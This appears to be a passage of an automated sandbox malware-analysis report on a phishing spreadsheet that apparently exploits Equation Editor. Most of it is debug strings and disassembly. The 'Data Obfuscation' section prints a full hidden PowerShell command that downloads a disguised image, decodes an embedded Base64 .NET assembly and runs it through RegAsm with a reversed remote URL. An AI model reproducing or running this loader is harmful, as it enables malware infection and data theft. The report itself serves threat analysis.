            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wfbjvizcWo.exe, 0000000C.00000002.620770237.00000000000FE000.00000002.00000001.01000000.00000008.sdmp, wfbjvizcWo.exe, 0000000E.00000000.479928036.00000000000FE000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: find.pdbN source: RegAsm.exe, 0000000B.00000002.466574369.000000000052D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: 5B430000.0.dr Initial sample: OLE indicators vbamacros = False
            Source: Mac Purchase Order PO102935.xls Initial sample: OLE indicators encrypted = True

            Data Obfuscation

            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated Base64 string omitted]'
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
            Source: sqlite3.dll.13.dr Static PE information: section name: /4
            Source: sqlite3.dll.13.dr Static PE information: section name: /19
            Source: sqlite3.dll.13.dr Static PE information: section name: /31
            Source: sqlite3.dll.13.dr Static PE information: section name: /45
            Source: sqlite3.dll.13.dr Static PE information: section name: /57
            Source: sqlite3.dll.13.dr Static PE information: section name: /70
            Source: sqlite3.dll.13.dr Static PE information: section name: /81
            Source: sqlite3.dll.13.dr Static PE information: section name: /92
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 5_2_0062F2D6 push eax; ret 5_2_0062F2D7
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 5_2_006303DA push eax; ret 5_2_006303DB
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 5_2_0062BC88 push edx; retf 0002h 5_2_0062BC91
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_006125E2 push ebx; retf 10_2_006125EA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_006121C8 push ebx; iretd 10_2_006121EA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00612DA5 pushad ; ret 10_2_00612DA9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00612DB0 pushfd ; ret 10_2_00612DB9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00407052 push cs; retf 11_2_00407057
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_004179B3 push eax; iretd 11_2_004179B4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00403260 push eax; ret 11_2_00403262
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0040820F push edx; retf 11_2_00408210
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0040A213 push edi; iretd 11_2_0040A21D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00414226 push esp; ret 11_2_00414227
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_004152E7 push edi; iretd 11_2_004152E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00408350 push eax; ret 11_2_00408353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00413C34 pushad ; retf 11_2_00413C3A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0041E4CA push 0000003Bh; ret 11_2_0041E4CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00417D52 push es; retf 11_2_00417D53
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00411F2E push edx; iretd 11_2_00411F35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0041A7CA push FFFFFFC3h; retf 11_2_0041A7F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022BDFA1 push ecx; ret 11_2_022BDFB4
